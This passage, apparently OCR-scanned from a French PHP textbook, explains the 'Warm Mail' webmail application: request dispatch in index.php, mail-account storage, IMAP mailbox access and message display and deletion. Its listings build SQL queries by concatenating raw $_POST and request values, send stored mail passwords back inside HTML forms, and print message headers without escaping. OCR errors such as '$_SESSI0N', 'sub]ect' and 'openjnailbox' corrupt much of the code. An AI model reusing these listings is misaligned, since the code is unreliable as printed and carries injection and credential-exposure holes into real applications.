$body = add_quoting(stripslashes(imap_body($imap, 

$messageid) ) ) ; 

imap_close($imap) ; 

display_new_message_form($_SESSION[ 'auth_user' ] , 
$to, $cc, $subject, $body); 

} 

break; 

case ' reply ' : 

// Configure l'adresse de destination comme l'adresse de reponse 
// ou d'expedition du message courant. 
if(!$imap) { 

$imap = open_mailbox ($_SESSI0N [ ' auth_user ' ] , 

$_SESSI0N [ ' selected_account ' ] ) ; 

} 

if($imap) { 
$header = imap_header($imap, $messageid); 
if ($header->reply_toaddress) { 

$to = $header->reply_toaddress; 
} else { 

$to = $header->f romaddress ; 

} 

$subject = "Re: " .$header->sub]ect; 
$body = add_quoting(stripslashes(imap_body($imap, 

$messageid) ) ) ; 

imap_close($imap) ; 

display_new_message_form($_SESSION[ 'auth_user' ] , 

$to, $cc, $subject, $body); 

} 

break; 

case ' forward ' : 

// Configure le message comme une citation du message courant. 
if(!$imap) { 
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$imap = openjnailbox ($_SESSI0N [ 1 auth_user 1 ] , 

$_SESSI0N [ 1 selected_account 1 ] ) ; 

} 

if($imap) { 
$header = imap_header($imap, $messageid) ; 
$body = add_quoting(stripslashes(imap_body($imap, 

$messageid) ) ) ; 

$subject = "Fwd: " .$header->subject; 
imap_close($imap) ; 

display_new_message_form($_SESSION[ 'auth_user' ] , 

$to, $cc, $subject, $body); 

} 

break; 

case 1 new-message ' : 

display_new_message_f orm($_SESSION[ 1 auth_user 1 ] , 

$to, $cc, $subject, $body); 

break; 

} 

} 

/ ^*********************************************************************** 
// Etape 4 :: pied de page 

do_html_f ooter( ) ; 

?> 



Le script index.php utilise une approche evenementielle. II sait quelle fonction appeler 
pour chaque evenement. Ici, les evenements sont declenches lorsque 1' utilisateur clique 
sur les differents boutons du site, chacun etant associe a une action. La plupart de ces 
boutons sont produits par la fonction display button (), sauf les boutons de soumis- 
sion, qui sont pris en charge par la fonction display form button ( ). Ces deux fonc- 
tions sont definies dans le fichier output Jns.php et toutes les deux ramenent 
l'utilisateur a des URL de la forme : 

index. php?action=log-out 

C'est la valeur de la variable action lors de l'appel de index.php qui determine le 
gestionnaire d' evenement a activer. 

Ce script peut etre decoupe en quatre sections : 

1. On effectue les traitements qui doivent avoir lieu avant d'envoyer l'en-tete de page 
au navigateur. C'est notamment dans cette section que Ton demarre la session, que 
Ton execute tous les pretraitements pour Taction choisie et que Ton decide de 
1' aspect des en-tetes. 

2. On traite et on envoie les en-tetes et la barre de menu appropries a Taction choisie 
par l'utilisateur. 
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3. On choisit le corps du script a executer en fonction de Taction choisie. Les differentes 
actions declenchent des appels de fonctions distincts. 

4. On envoie le pied de page. 

Si vous parcourez rapidement le code de ce script, vous remarquerez que nous avons 
introduit chaque section par un commentaire explicatif. 

Pour bien comprendre ce script, nous allons examiner chaque action proposee par le 
site. 



Connexion et deconnexion 

Lorsqu'un utilisateur charge la page index.php, il voit ce qui est presente a la 
Figure 27.2. 



File Edrt View Histnty Bnokmaiks Tunis Help 

^ T ^ " @ Q I i-i tittp://[pealhest/phpfflysqWe/chapterZ9Anden.php 



| Q>j^w Message | Q>-^ycount Setup 



You need to log in. 



ZEES 





Figure 27.2 

L'ecran de connexion de Warm Mail demande un nom d'utilisateur et un mot de passe. 



L'affichage de l'ecran de connexion est done le comportement par defaut de 1' applica- 
tion. Si aucune $action n'a encore ete choisie ni aucun detail fourni, PHP executera les 
parties du code que nous allons maintenant decrire. 

Lors de l'etape de pretraitement, PHP commence par executer le code suivant : 

include ( ' include_f ns . php 1 ) ; 
session_start( ) ; 
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Ces deux lignes demarrent la session qui servira a memoriser les variables de session 
$auth user et $selected account que nous presenterons plus loin. 

Comme dans les autres applications, nous creons des variables avec des noms courts. 
La variable action merite d'etre examinee de plus pres car, selon sa provenance dans 
1' application, il peut s'agir d'une variable GET ou POST : c'est la raison pour laquelle on 
l'extrait du tableau $ REQUEST. La situation est identique pour la variable account, a 
laquelle on accede generalement via GET sauf quand on supprime un compte, auquel cas 
on y accede par POST. 

Pour economiser le travail de personnalisation de l'interface utilisateur, on se sert d'un 
tableau pour controler les boutons qui apparaissent dans la barre d'outils. On 
commence par declarer un tableau vide : 

$buttons = array ( ) ; 

Puis on cree les boutons que Ton souhaite voir apparaitre sur la page : 

$buttons[0] = 'view-mailbox'; 
$buttons[1] = 'new-message'; 
$buttons[2] = 'account-setup'; 

Si l'utilisateur se connecte en tant qu'administrateur, on ajoutera plus de boutons a ce 
tableau. 

Pour l'etape des en-tetes, on affiche un en-tete classique : 

do_html_header($_SESSION[ 'auth_user' ] , "Warm Mail", 
$_SESSI0N[ ' selected_account ' ] ) ; 

display_toolbar($buttons) ; 

Ce code affiche le titre et la barre d' en-tete, puis la barre des boutons que vous pouvez 
voir a la Figure 27.2. Ces fonctions sont definies dans le fichier output _fns.php mais, 
leur effet etant visible dans la figure, nous ne les detaillerons pas ici. 

Puis vient le corps du code : 

if ( !check_auth_user( ) ) { 
echo "<p>You need to log in"; 

if(($action) && ($action ! = ' log-out 1 ) ) { 
echo " to go to " .format_action($action) ; 

} 

echo ".</p>"; 

display_login_f orm($action) ; 

} 

La fonction check auth user() est definie dans la bibliotheque user_auth_fns.php. 
Vous avez deja rencontre un code similaire dans les projets precedents : il verifie que 
l'utilisateur est connecte et, si ce n'est pas le cas, comme ici, il affiche le formulaire de 



Chapitre 27 



Implementation d'un webmail 665 



connexion represente a la Figure 27.2. Ce formulaire est produit par la fonction 
display login form() de output _fns.php. 

Si l'utilisateur remplit correctement le formulaire et clique sur le bouton Log In, il verra 
ce qui est presente a la Figure 27.3. 



i' - ' a * ii 
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Figure 27.3 

Si la connexion a reussi, l'utilisateur peut commencer a utiliser /'application. 

Lors de l'execution de script, on active differentes sections de code. Le formulaire de 
connexion a deux champs : $username et $password. S'ils ont ete remplis, le fragment 
suivant du pretraitement sera active : 

if ($username | | $password) { 
if (login($username, $passwd)) { 
$status .= "<p style=\"padding-bottom: 100px\"> 

Logged in successfully .</p>" ; 
$_SESSI0N[ 'auth_user' ] = $username; 
if (number_of_accounts($_SESSION[ 1 auth_user 1 ] )==1 ) { 
$accounts = get_account_list($_SESSION[ 'auth_user' ] ) ; 
$_SESSION[ ' selected_account ' ] = $accounts[0] ; 

} 

} else { 

$status .= "<p style=\"padding-bottom: 100px\"> 
Sorry, we could not log you 
in with that username and password. </p>" ; 

} 

} 
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Comme vous pouvez le constater, ce code appelle la fonction login ( ) , qui ressemble a 
celle des Chapitres 25 et 26. Si tout se passe bien, vous enregistrez le nom de l'utilisateur 
dans la variable de session auth user. 

Outre la mise en place des boutons que vous verrez lorsque vous n'etes pas connecte, 
on ajoute un autre bouton pour permettre a l'utilisateur de se deconnecter : 

if (check_auth_user ( ) ) { 
$buttons[4] = 'log-out'; 

} 

Vous pouvez voir ce bouton a la Figure 27.3. 

Dans l'etape des en-tetes, vous reaffichez l'en-tete et les boutons et, dans le corps, vous 
affichez le message d'etat que vous avez configure plus haut : 

echo $status; 

II suffit ensuite de produire le pied de page et d'attendre une action de l'utilisateur. 



Configuration de comptes de courrier 

Lorsqu'un utilisateur lance pour la premiere fois Warm Mail, il doit configurer quelques 
comptes de courrier. S'il clique sur le bouton Account Setup, la variable action sera 
initialisee a account setup et rappellera le script index.php. L'utilisateur verra alors la 
page presentee a la Figure 27.4. 
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Figure 27.4 

Un utilisateur doit configurer les details de son compte de courrier avant de pouvoir lire 
ses messages. 
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Revenons au script du Listing 27.2. Cette fois-ci, vous obtiendrez un autre comporte- 
ment a cause de la valeur de la variable $action et vous aurez egalement un en-tete un 
peu different : 

do_html_header($_SESSION[ 1 auth_user 1 ] , "Warm Mail - ". 
f ormat_action ($action) , 
$_SESSI0N[ 1 selected_account 1 ] ) ; 

Mais, surtout, vous executerez un corps different : 

case 'store-settings': 
case 'account-setup': 
case ' delete-account ' : 

display_account_setup($_SESSION[ 'auth_user' ] ) ; 

break; 

C'est une parfaite illustration de 1' architecture de notre application : chaque commande 
utilisateur appelle une fonction appropriee. Ici, il s'agit de la fonction 
display account set up (), dont le code est presente dans le Listing 27.3. 

Listing 27.3 : Fonction display_account_setup() de outputjfns.php — Obtient et aff iche 
les details d'un compte de courrier 



function display_account_setup($auth_user) { 
// Affiche un formulaire "nouveau compte" 

display_account_f orm($auth_user) ; 
$list = get_accounts($auth_user) ; 
$accounts = sizeof ($list ) ; 

// Affiche tous les comptes enregistres pour cet utilisateur 
foreach($list as $key => $account) { 

// Affiche des formulaires contenant les details des comptes. 
// Notez que nous envoyons le mot de passe de tous les comptes dans 
// le code HTML, ce qui n'est pas vraiment conseille. 
display_account_f orm($auth_user, $account[ 'accountid' ] , 

$account [ ' server ' ] , $account [ ' remoteuser ' ] , 
$account [ ' remotepassword ' ] , $account [ ' type ' ] , 
$account[ 'port ' ] ) ; 

} 

} 



Lappel de display account setup () provoque l'affichage d'un formulaire vide 
permettant d'ajouter un nouveau compte de courrier, suivi de formulaires modifiables 
contenant les informations de chaque compte de courrier de l'utilisateur courant. La 
fonction display account f orm( ) produit l'affichage presente a la Figure 27.4. Ici, on 
l'utilise de deux facons differentes : sans parametre, elle affiche un formulaire vide, 
tandis qu'avec l'integralite des parametres elle affiche le contenu d'un compte de cour- 
rier enregistre. Cette fonction est definie dans la bibliotheque output Jns.php ; comme 
elle se contente d'afficher du HTML, nous ne la decrirons pas ici. 
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La fonction get accounts () recupere les informations sur les comptes existants a 
partir de la base de donnees. Elle est dermic dans la bibliotheque mail fns . php et son 
code est presente dans le Listing 27.4. 

Listing 27.4 : Fonction get_accounts() de mailjns.php — Recupere tous les details sur 
les comptes de courrier d'un utilisateur donne 



function get_accounts($auth_user) { 
$list = array ( ) ; 
if($conn = db_connect ( ) ) { 

$query = "select * from accounts where username = ' " .$auth_user. " 
$result = $conn->query ($query) ; 
if($result) { 
while($settings = $result->f etch_assoc ( ) ) { 
array_push($list, $settings); 

} 

} else { 
return false; 

} 

} 

return $list; 

} 



Comme vous pouvez le constater, get accounts () se connecte au SGBDR, recupere 
les details de tous les comptes de courrier de l'utilisateur indique et les renvoie dans un 
tableau. 

Creation d'un compte de courrier 

Si un utilisateur remplit le formulaire pour un compte de courrier et clique sur le bouton 
Save Changes, cela aura pour effet d'activer Taction store settings. Etudions le code 
de gestion de cet evenement dans index.php. Lors de l'etape de pretraitement, les 
instructions suivantes s'executent : 

case 'store-settings': 

store_account_settings($_SESSION[ 'auth_user' ] , $_P0ST) ; 
break; 

La fonction store account settings ( ) inscrit les details du nouveau compte dans la 
base de donnees. Son code est presente dans le Listing 27.5. 

Listing 27.5 : Fonction store_account_settings() de mail_fns.php — Enregistre les 
details du nouveau compte courrier d'un utilisateur 



function store_account_settings($auth_user, $settings) { 
if ( !filled_out($settings) ) { 

echo "<p>All fields must be filled in. Try again. </p>"; 
return false; 
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} else { 

if ($settings[ 'account' ]>0) { 
$query = "update accounts 

set server = '" . $settings[server] . "', 
port = " . $settings[port] . ", 
type = '" . $settings[type] . "', 
remoteuser ='" . $settings[remoteuser] . "', 
remotepassword ='" . $settings[remotepassword] . "' 
where accountid = '" . $settings[account] . 
"'and username = '" . $auth_user . ; 

} else { 

$query = "insert into accounts values ( ' " . $auth_user . " ' , 

' " .$settings[server] . " ' , ' " .$settings[port] . " ' , 

' " .$settings[type] . " ' , ' " . $settings [ remoteuser] . " ' , 

' " .$settings[remotepassword] . " ' , NULL) " ; 

} 

if ($conn=db_connect() ) { 

$result=$conn->query ($query) ; 
if ($result) { 

return true; 
} else { 

return false; 

} 

} else { 

echo "<p>Could not store changes. </p>" ; 
return false; 

} 

} 

} 



Comme vous pouvez le constater, les deux choix dans store account settings() 
correspondent a l'insertion d'un nouveau compte et a la mise a jour d'un compte exis- 
tant. Dans les deux cas, la fonction execute la requete SQL appropriee pour sauvegarder 
les details du compte. 

Apres avoir enregistre les details d'un compte, on revient a index.php, pour executer le 
corps principal du script : 

case 'store-settings': 
case 'account-setup': 
case ' delete-account ' : 

display_account_setup($_SESSION[ 'auth_user' ] ) ; 

break; 

On execute done la fonction display account setup ( ) pour afficher la liste des details 
sur les comptes courrier de l'utilisateur ; le compte nouvellement cree fera partie de 
cette liste. 
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Modifier un compte de courrier existant 

Le traitement de la modification d'un compte existant est similaire. L'utilisateur peut 
modifier les details de ce compte et cliquer sur le bouton Save Changes. La encore, ce 
clic declenchera Taction store settings mais, cette fois-ci, la fonction mettra a jour 
les details du compte au lieu de les inserer. 

Supprimer un compte de courrier 

Pour supprimer un compte de courrier, l'utilisateur doit cliquer sur le bouton Delete 
Account qui est place sous chaque compte de la liste. Cela aura pour effet d'activer 
Taction delete account. 

La section de pretraitement de index, php executera alors les instructions suivantes : 

case ' delete-account ' : 

delete_account($_SESSION[ 'auth_user' ] , $account) ; 
break; 

Ce code appelle la fonction delete account (), dont le code est presente dans le 
Listing 27.6. La suppression d'un compte doit etre traitee avant Ten-tete car ce dernier 
permet de choisir le compte a utiliser a partir d'une liste : celle-ci doit done etre mise a 
jour avant d'etre affichee. 

Listing 27.6 : Fonction delete _account() de mailjfns.php — Supprime un compte de 
courrier 



function delete_account ($auth_user, $accountid) { 

// Supprime un des comptes de cet utilisateur dans la BD 

$query = "delete from accounts where accountid = ' " .$accountid . " 

and username = ' " .$auth_user. ; 
if ($conn=db_connect( ) ) { 

$result = $conn->query ($query) ; 

} 

return $result; 

} 



Apres le retour a index . php, le corps principal du script execute le code suivant : 

case 'store-settings': 
case 'account-setup': 
case 'delete-account': 

display_account_setup($_SESSION[ 'auth_user' ] ) ; 

break ; 

Vous remarquerez qu'il s'agit du meme code que precedemment : il ne fait qu'afficher 
la liste des comptes de l'utilisateur. 
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Lecture du courrier 

Lorsque l'utilisateur a configure des comptes, il peut passer au plat de resistance : la 
connexion a ces comptes et la lecture du courrier. 

Choisir un compte 

L'utilisateur doit choisir l'un de ses comptes pour y lire son courrier. Le compte courant 
selectionne est stocke dans la variable de session $selected account. 

Si l'utilisateur n'a enregistre qu'un seul compte de courrier dans le systeme, celui-ci 
sera automatiquement selectionne lorsqu'il se connecte : 

if (number_of_accounts($_SESSION[ 'auth_user' ] )==1 ) { 
$accounts = get_account_list($_SESSION[ 1 auth_user 1 ] ) ; 
$_SESSION[ 1 selected_account ' ] = $accounts[0] ; 

} 

La fonction number of accounts ( ) dermic dans mailjhs.php determine si l'utilisateur 
a plusieurs comptes. Son code est presente dans le Listing 27.7. La fonction 
get account list() recupere un tableau contenant les identifiants des comptes de 
l'utilisateur. Ici, il n'y a qu'un compte et vous pouvez done acceder a son identifiant par 
l'indice de ce tableau. 

Listing 27.7 : Fonction number_of_accounts() de mail_fns.php — Determine le nombre 
de comptes enregistres par l'utilisateur 



function number_of_accounts ($auth_user) { 

// Recupere le nombre de comptes courrier de cet utilisateur 
$query = "select count(*) from accounts where 
username = ' " .$auth_user. " ' " ; 

if ($conn=db_connect( ) ) { 

$result = $conn->query ($query) ; 
if($result) { 

$row = $result->f etch_array ( ) ; 
return $row[0] ; 

} 

} 

return 0; 

} 



get account list ( ) ressemble a la fonction get accounts ( ) que nous avons etudiee 
auparavant, sauf qu'elle ne renvoie que les noms des comptes. 

Si un utilisateur a enregistre plusieurs comptes, il devra en choisir un. En ce cas, les en- 
tetes contiendront une balise SELECT permettant d'enumerer les comptes disponibles. 
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Comme le montre la Figure 27.5, le choix d'un compte particulier provoque l'affichage 
automatique des boites qu'il contient. 



Figure 27.5 
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Cette balise SELECT est produite par le fragment de code suivant, extrait de la fonction 
do html header () de output _fns.php : 

II On n'inclut la balise SELECT que si 1 ' utilisateur a plusieurs comptes 
// de courrier. 

if (number_of_accounts($auth_user) > 1) { 

echo "<form action=\ " index . php?action=open-mailbox\ " method=\ " post\ "> 

<td bgcolor=\"#ff6600\" align=\ " right\ " valign=\ "middle\ ">" ; 

display_account_select ($auth_user, $selected_account) ; 
echo "</td> 

</f orm>" ; 

} 

En regie generale, nous avons evite de presenter le code HTML utilise dans les exem- 
ples de ce livre, mais celui produit par la fonction display account select ( ) merite 
une visite. 

En fonction des comptes de 1' utilisateur, cette fonction produit du HTML comme celui- 
ci : 

<select 

onchange= "window. location=t his . options [ selected Index] .value 
name=account"> 

<option 

value="index.php?action=select-account&account=4" selected > 
thickbook . com 
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</option> 
<option 

value="index.php?action=select-account&account=3"> 
localhost 
</option> 
</select> 

L'essentiel de ce code consiste en un unique element SELECT de HTML, mais il contient 
egalement un peu de JavaScript. Tout comme PHP peut produire du HTML, il peut 
egalement servir a generer des scripts qui s'executeront cote client. 

A chaque fois qu'un evenement a lieu sur cet element, JavaScript initialise 
window. location a la valeur de l'option choisie. Si, par exemple, 1' utilisateur selec- 
tionne la premiere option du SELECT, window. location sera initialisee avec 
' index . php?action=select account&account=1 ' , ce qui provoquera le chargement 
de cette URL. Evidemment, si 1' utilisateur possede un navigateur qui ne reconnait pas 
JavaScript ou s'il a desactive JavaScript, ce code n'aura aucun effet. 

La fonction display account select ( ) , dermic dans output Jns.php, recupere la liste 
des comptes disponibles et affiche le SELECT. Elle appelle egalement la fonction 
get account list () que nous avons presentee plus haut. 

La selection d'une des options du SELECT active l'evenement select account. Si vous 
examinez l'URL de la Figure 27.5, vous pourrez constater que cet evenement est ajoute 
a la fin de l'TJRL, avec l'identifiant du compte choisi. 

L'ajout de ces deux variables GET a deux effets. Le premier est que, dans l'etape de 
pretraitement de index.php, le compte choisi est stocke dans la variable de session 
Sselected account : 

case 'select-account': 

//if have chosen a valid account, store it as a session variable 
if ( ($account) && (account_exists($_SESSION[ ' auth_user ' ] , 
$account))) { 
$_SESSION[ ' selected_account ' ] = $account; 

} 

break ; 

Le second est que le code suivant est execute dans le corps principal du script : 

case 'select-account': 
case 'view-mailbox': 

// Si la boite vient d'etre choisie ou que l'on a demande a voir la 

// boite, on l'affiche. 

display_list($_SESSION[ 'authjjser' ] , 

$_SESSION[ ' selected_account ' ] ) ; 

break; 

Comme vous pouvez le constater, on effectue ici le meme traitement que si l'utilisateur 
avait choisi l'option View Mailbox, ce qui est l'objet de la section suivante. 
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Consulter le contenu d'une boite aux lettres 

La fonction display list( ) permet de consulter le contenu des boites aux lettres en 
affichant la liste de tous les messages de la boite. Son code est presente dans le 
Listing 27.8. 

Listing 27.8 : Fonction display_list() de outputjfns.php — Affiche tous les messages 
d'une boite 



function display_list($auth_user, $accountid) { 

// Affiche la liste des messages de cette boite aux lettres. 

global $table_width; 

if ( !$accountid) { 

echo "<p style=\"padding-bottom: 100px\">No mailbox selected. </p>" ; 
} else { 

$imap = open_mailbox($auth_user, $accountid); 
if($imap) { 

echo "<table width=\ " " .$table_width . " \ " cellspacing=\ "0\ " 

cellpadding=\ "6\ " border=\ "0\ ">" ; 

$headers = imap_headers($imap) ; 

// Nous pourrions reformater ces donnees ou obtenir d'autres 
// details grace a imap_fetchheaders, mais ces informations nous 
// suffisent ici. Nous nous contentons done de les afficher telles 
// quelles. 

$messages = sizeof ($headers) ; 
for($i = 0; $i<$messages; $i++) { 
echo "<tr><td bgcolor=\""; 
if($i%2) { 

echo "#ffffff"; 
} else { 
echo "#ffffcc"; 

} 

echo " \ "><a href =\ " index . php?action=view-message&messageid=" 

. ($i+1)."\">"; 
echo $headers[$i] ; 
echo "</a></td></tr>\n" ; 

} 

echo "</table>"; 
} else { 

$account = get_account_settings($auth_user, $accountid); 
echo "<p style=\ "padding-bottom: 100px\ ">Could not open mail 
box " . $account [ ' server ' ] . " .</p>" ; 

} 

} 

} 
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C'est dans display list ( ) que Ton commence vraiment a utiliser les fonctions IMAP 
de PHP. Les deux points essentiels, ici, sont l'ouverture de la boite aux lettres et la 
lecture des en-tetes des messages. 

On ouvre la boite aux lettres d'un compte de courrier par un appel a la fonction 
open mailbox ( ) dermic dans mailjns.php. Son code est presente dans le Listing 27.9. 

Listing 27.9 : Fonction open_mailbox() de mail_fns.php — Connexion a une boite aux 
lettres 



function open_mailbox($auth_user, $accountid) { 

// Choisit la boite aux lettres s'il n'y en a qu'une. 
if (number_of_accounts($auth_user) == 1 ) { 

$accounts = get_account_list ($auth_user) ; 

$_SESSI0N[ ' selected_account ' ] = $accounts[0] ; 

$accountid = $accounts[0] ; 

} 

// Connexion au serveur P0P3 ou IMAP choisi par 1 ' utilisateur . 
$settings = get_account_settings($auth_user, $accountid); 
if ( Isizeof ($settings) ) { 
return 0; 

} 

$mailbox = 1 { 1 . $settings [ server] ; 
if ($settings[type]=='P0P3' ) { 
$mailbox .= '/pop3'; 

} 

$mailbox .= 1 : 1 .$settings[port] . 1 }INB0X' ; 

// Suppression des alertes, ne pas oublier de verifier la valeur 
// renvoyee. 

@$imap = imap_open($mailbox, $settings [ ' remoteuser ' ] , 

$settings [ ' remotepassword ' ] ) ; 
return $imap; 

} 



La boite aux lettres est ouverte par un appel a la fonction imap open ( ) , qui a le proto- 
type suivant : 

int imap_open (string mailbox, string username, string password 
[ , int options] ) 

Les parametres ont les significations suivantes : 

■ mailbox. Chaine contenant le nom du serveur et celui de la boite aux lettres avec, 
eventuellement, un numero de port et un protocole. Le format de cette chaine est : 

{nom note I protocole :port}nom boite. 
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Si le protocole n'est pas indique, sa valeur par defaut est IMAP. Dans notre code, 
vous pouvez constater que nous avons utilise le protocole POP3 lorsque l'utilisateur 
precise ce protocole pour un compte particulier. 

Pour, par exemple, lire le courrier stocke sur la machine locale en utilisant les ports 
par defaut, on utilisera le nom de boite suivant pour IMAP : 

{localhost:143}INB0X 

Et on utilisera ce nom pour POP3 : 

{ localhost / pop3 : 1 1 0} I NBOX 

■ username. L'utilisateur de ce compte. 

■ password. Le mot de passe de ce compte. 

On peut egalement utiliser des indicateurs facultatifs pour preciser des options comme 
"ouvrir la boite aux lettres en lecture seulement". 

Vous remarquerez que nous avons construit le nom de la boite aux lettres morceau par 
morceau en utilisant l'operateur de concatenation avant de la passer a imap open(). 
Vous devez faire tres attention lorsque vous construisez ce nom car les chaines qui 
contiennent {$ peuvent poser des problemes en PHP. 

Cette fonction renvoie un flux IMAP si la boite a pu etre ouverte ou false sinon. 

Lorsque Ton n'a plus besoin du flux IMAP, on peut le fermer par un appel a 
imap close (flux imap). Ici, on renvoie ce flux au programme principal. On peut 
ensuite utiliser la fonction imap headers ( ) pour obtenir les en-tetes du courrier afm de 
pouvoir les afficher : 

$headers = imap_headers($imap) ; 

Cette fonction renvoie les en-tetes de tous les messages contenus dans la boite a 
laquelle on est connecte. Ces informations ne sont pas formatees et sont renvoyees sous 
la forme d'un tableau, a raison d'une ligne par message. Notre fonction se contente 
d'afficher une ligne par message, comme vous pouvez le constater a la Figure 27.5. 

Vous pouvez obtenir plus d' informations sur les en-tetes a l'aide de la fonction 
imap header(), dont le nom, malheureusement, est souvent confondu avec 
imap headers(). Ici, cependant, cette derniere nous donne suffisamment d'infor- 
mations pour nos besoins. 

Lecture d'un e-mail 

Dans la fonction display list(), nous avons configure chacun des messages pour 
qu'ils s'affichent sous la forme d'un lien pointant vers chaque message electronique. 
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Voici le format de chacun de ces liens : 

index . php?action=view-message&messageid=6 

L'identificateur de message, messageid, est un numero de sequence utilise dans les en- 
tetes que nous venons de recuperet Vous remarquerez que les messages IMAP sont 
numerates a partir de 1, et non de 0. 

Si l'utilisateur clique sur l'un de ces liens, il obtient la page presentee a la Figure 27.6. 



Figure 27.6 
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Lorsque ces parametres sont passes au script index.php, celui-ci execute le code 
suivant : 

case 'show-headers' 

case 'hide-headers' 

case 'view-message' 

// Si l'on vient de prendre un message dans la liste ou que l'on 
// consulte un message et que l'on a choisi de cacher ou de montrer 
// les en-tetes, charger le message. 



$fullheaders = ($action == 'show-headers'); 

display_message($_SESSION[ 'auth_user' ] , 

$_SESSION[ ' selected_account ' ] , 
$messageid, $f ullheaders) ; 

break ; 
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Vous remarquerez que nous comparons $action et 'show headers'. Ici, ces valeurs 
etant differentes, la comparaison renvoie false et $f ullheaders prendra done egale- 
ment la valeur false. Nous reviendrons sur Taction 'show headers' dans un moment. 

La ligne : 

$f ullheaders = ($action== ' show-headers ') ; 

aurait pu etre ecrite de la maniere suivante : 

if ($action== ' show-headers ' ) 

$fullheaders = true; 
else 

$fullheaders = false; 

Puis nous appelons la fonction display message(). L'essentiel de cette fonction se 
contente d'afficher du code HTML, e'est pourquoi nous ne Tetudierons pas plus en 
detail ici. Elle appelle la fonction retrieve message () pour recuperer le message 
approprie dans la boite aux lettres : 

$message = retrieve_message($auth_user, $accountid, $messageid, 

$f ullheaders) ; 

La fonction retrieve message () se trouve dans la bibliotheque mail_fns.php et son 
code est presente dans le Listing 27.10. 

Listing 27.10 : La fonction retrieve _message() de mailjfns.php — Cette fonction 
recupere un message particulier dans une boite aux lettres 



function retrieve_message($auth_user, $accountid, $messageid, 

$fullheaders) { 

$message = array ( ) ; 

if ( ! ($auth_user && $messageid && $accountid)) { 
return false; 

} 

$imap = open_mailbox($auth_user, $accountid); 
if(!$imap) { 
return false; 

} 

$header = imap_header($imap, $messageid); 

if(!$header) { 
return false; 

} 

$message[ 'body' ] = imap_body($imap, $messageid); 
if ( !$message[ ' body ' ] ) { 
$message[ 'body' ] = "[This message has no body] \n\n\n\n\n\n" ; 

} 

if ($fullheaders) { 

$message[ ' f ullheaders ' ] = imap_f etchheader ($imap, $messageid) ; 
} else { 

$message[ 'f ullheaders ' ] = ''; 

} 
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$message[ ' subject ' ] = $header->subj ect ; 
$message [ ' f romaddress ' ] = $header->f romaddress; 
$message[ 'toaddress' ] = $header->toaddress; 
$message[ 'ccaddress' ] = $header->ccaddress; 
$message[ 'date' ] = $header->date; 

// On pourrait obtenir des informations plus detaillees en utilisant 
// 'from' et 'to' au lieu de 'f romaddress' et 'toaddress', mais ces 
// dernieres sont plus simples a comprendre. 

imap_close($imap) ; 
return $message; 

} 



Une fois encore, nous nous sommes servis de open mailbox ( ) pour ouvrir la boite aux 
lettres de l'utilisateur. Cependant, nous cherchons cette fois-ci un message particulier. 
En utilisant cette bibliotheque de fonctions, nous chargeons les en-tetes du message et 
le corps du message independamment. 

Nous nous servons des fonctions IMAP imap header(), imap f etchheader ( ) et 
imap body(). Vous remarquerez que les deux fonctions d'en-tete sont differentes de 
imap headers ( ) , que nous avions utilisee precedemment. II faut faire attention a ne pas 
confondre leurs noms. 

Pour resumer : 

■ imap headers ( ). Renvoie un resume des en-tetes de tous les messages de la boite 
aux lettres, sous la forme d'un tableau, avec un seul element par message. 

■ imap header (). Renvoie les en-tetes d'un message particulier, sous la forme d'un 
objet. 

■ imap f etchheader ( ). Renvoie les en-tetes d'un message particulier, sous la forme 
d'une chaine. 

Ici, nous nous servons de imap header () pour remplir des champs d'en-tete specifi- 
ques et de imap f etchheader ( ) pour afficher l'integralite des en-tetes, si necessaire. 
Nous y reviendrons un peu plus loin. 

Nous utilisons imap header () et imap body() pour construire un tableau contenant 
tous les elements du message qui nous interesse. 

Nous appelons imap header ( ) de cette maniere : 

$header = imap_header($imap, $messageid) ; 
Nous extrayons ensuite chacun des champs dont nous avons besoin, a partir de 1' objet : 

$message[ ' subject ' ] = $header->subject; 
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Puis nous appelons imap body ( ) pour ajouter le corps du message dans notre tableau, 
comme ceci : 

$message[ ' body ' ] = imap_body ($imap, $messageid) ; 

Pour terminer, nous fermons la boite aux lettres avec imap close ( ) et nous renvoyons 
le tableau que nous venons de construire. La fonction display message () peut alors 
afficher les champs du message dans le formulaire que vous pouvez voir a la 
Figure 27.6. 

Afficher les en-tetes d'un message 

Comme vous pouvez le constater a la Figure 27.6, le message contient un bouton Show 
Headers a droite des autres options. Ce bouton active l'option show headers, qui ajoute 
l'integralite des en-tetes de courrier dans le message a afficher. Si l'utilisateur clique sur 
ce bouton, il obtient une page comparable a celle de la Figure 27.7. 



Figure 27.7 
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Comme vous l'avez surement deja remarque, la gestion de l'evenement view message 
englobe show headers (et son homologue hide headers). Si cette option est selection- 
nee, nous faisons comme auparavant, mais, dans retrieve message(), nous recupe- 
rons egalement le texte des en-tetes : 

if ($f ullheaders) 

$message[ ' f ullheaders 1 ] = imap_f etchheader ($imap, $messageid); 

Nous pouvons ensuite afficher ces en-tetes. 
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Suppression des messages 

Si un utilisateur clique sur le bouton Delete d'un message particulier, il active l'option 
"delete", qui provoque l'execution du code suivant de index.php : 

case ' delete ' : 

delete_message($_SESSION[ 'auth_user' ] , 

$_SESSI0N[ ' selected_account ' ] , $messageid) ; 
// Remarquez l'absence volontaire de 'break' pour continuer au cas 
// suivant. 

case 'select-account': 
case 'view-mailbox': 

// Si on vient de choisir la boite ou que l'on a choisi de la 

// visualiser, on montre la boite 

display_list($_SESSION[ 'auth_user' ] , 

$_SESSION[ ' selected_account ' ] ) ; 

break 

Comme vous pouvez le constater, le message est supprime par la fonction 
delete message ( ) , puis la boite aux lettres est affichee, comme precedemment. 

Le code de la fonction delete message ( ) se trouve dans le Listing 27.11. 

Listing 27.11 : La fonction delete _message() de mail_fns.php — Cette fonction 
supprime un message particulier dans une boite aux lettres 



function delete_message($auth_user, $accountid, $message_id) { 
// Supprime un message du serveur 

$imap = open_mailbox($auth_user, $accountid); 
if($imap) { 

imap_delete($imap, $message_id) ; 

imap_expunge($imap) ; 

imap_close($imap) ; 

return true; 

} 

return false; 

} 



Comme vous pouvez le voir, cette fonction se sert d'un certain nombre de fonctions 
IMAP, notamment de imap delete () et de imap expunge(). La fonction 
imap delete () se contente de marquer les messages qui doivent etre supprimes mais 
ne les supprime pas reellement. Vous pouvez marquer autant de messages que vous le 
souhaitez. C'est l'appel a imap expunge ( ) qui les efface defmitivement. 

Envoyer du courrier 

Nous arrivons finalement a 1' envoi du courrier, qui regroupe en fait trois actions : 
envoyer un nouveau message, repondre a un message et faire suivre un message. 
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Envoyer un nouveau message 

L'utilisateur peut choisir d'envoyer un nouveau message en cliquant sur le bouton New 
Message. Cela active Taction "new message", qui execute le code suivant dans 
index . php : 

